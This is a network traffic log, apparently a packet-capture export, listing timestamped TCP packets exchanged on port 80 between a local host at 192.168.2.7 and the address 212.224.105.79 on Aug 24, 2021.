Aug 24, 2021 08:46:53.360966921 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.360971928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.360999107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361013889 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361020088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361041069 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361049891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361063004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361085892 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361107111 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361109972 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361126900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361148119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361150980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361167908 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361175060 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361190081 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361210108 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361217022 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361229897 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361253023 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361260891 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361274958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361293077 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361295938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361315966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361335993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361356020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361360073 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361376047 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361396074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361402988 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361418009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361426115 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361435890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361453056 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361468077 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361485004 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361501932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361521959 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361526966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361546993 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361562967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361572027 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361582994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361598015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361603022 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361623049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361632109 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361643076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361664057 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361665964 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361690998 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.361702919 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.361819029 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.363853931 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.367299080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.367338896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.367475986 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.368621111 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.383781910 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383826971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383850098 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383874893 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383898020 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383922100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383948088 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383972883 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.383975983 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.383997917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384015083 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384021997 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384044886 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384046078 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384068966 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384076118 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384093046 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384115934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384124994 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384143114 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384169102 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384170055 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384191990 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384215117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384228945 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384238005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384254932 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384258032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384278059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384298086 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384301901 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384322882 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384344101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384360075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384363890 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384385109 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384390116 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384406090 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384428024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384428024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384449005 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384469032 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384484053 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384494066 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384514093 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384516001 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384537935 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384562016 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384583950 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384583950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384603977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384619951 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384627104 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384650946 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384660959 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384677887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384701967 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384721994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384726048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384742975 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384763956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384784937 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384785891 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384808064 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384814024 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384829044 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.384838104 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.384881973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.385921955 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.385963917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.385984898 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.386312008 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.386517048 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.407473087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407516003 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407536030 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407557011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407576084 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407597065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407618999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407622099 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.407640934 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407682896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.407726049 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.407959938 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.407989979 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408011913 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408025980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408031940 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408052921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408058882 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408075094 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408096075 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408102989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408123970 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408144951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408149004 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408165932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408188105 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408190012 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408210039 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408227921 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408236980 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408246994 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408271074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408282995 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408293962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408317089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408318043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408339024 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408360958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408361912 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408385992 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408401966 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408409119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408431053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408449888 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408452034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408473015 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408488989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408490896 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408505917 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408524036 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408529043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408555031 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408570051 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408577919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408598900 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408618927 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408620119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408641100 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408658028 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408663034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408684969 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408701897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408709049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408734083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408747911 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.408756971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.408803940 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.409018040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.409039974 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.409064054 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.409084082 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.409085989 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.409126043 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.429883957 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.429925919 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.429949045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.429970026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.429990053 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.430011034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.430026054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.430028915 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.430049896 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.430085897 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.430114985 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431355000 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431391954 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431411982 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431432009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431457043 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431478977 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431490898 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431499958 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431521893 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431523085 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431545973 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431567907 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431582928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431590080 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431610107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431612015 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431633949 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431653023 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431657076 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431679010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431700945 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431710005 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431721926 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431740999 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431752920 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431761980 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431782007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431785107 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431809902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431833029 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431847095 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431854010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431875944 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431876898 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431898117 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431915998 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431917906 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431938887 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431957960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.431969881 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.431981087 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432002068 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.432003021 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432024956 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432044983 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432065010 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432065964 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.432091951 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432101011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.432140112 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432141066 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.432161093 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432182074 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432202101 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432219982 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.432221889 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432240009 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432275057 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432281017 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.432296991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432317972 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432341099 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.432351112 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.432378054 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.452167034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452213049 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452235937 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452256918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452280045 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452301025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452326059 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452332973 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.452348948 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.452495098 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.452513933 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454437971 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454478025 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454502106 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454524040 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454546928 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454546928 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454571962 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454581976 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454595089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454618931 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454631090 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454643011 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454659939 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454663038 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454687119 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454710007 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454710960 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454737902 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454760075 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454765081 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454781055 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454801083 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454808950 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454819918 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454838991 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454853058 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454858065 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454878092 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454880953 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454900026 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454921961 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454926968 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454941034 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454961061 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454981089 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.454988956 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.454999924 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455020905 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455029011 CEST	49715	80	192.168.2.7	212.224.105.79
Aug 24, 2021 08:46:53.455040932 CEST	80	49715	212.224.105.79	192.168.2.7
Aug 24, 2021 08:46:53.455056906 CEST	49715	80	192.168.2.7	212.224.105.79
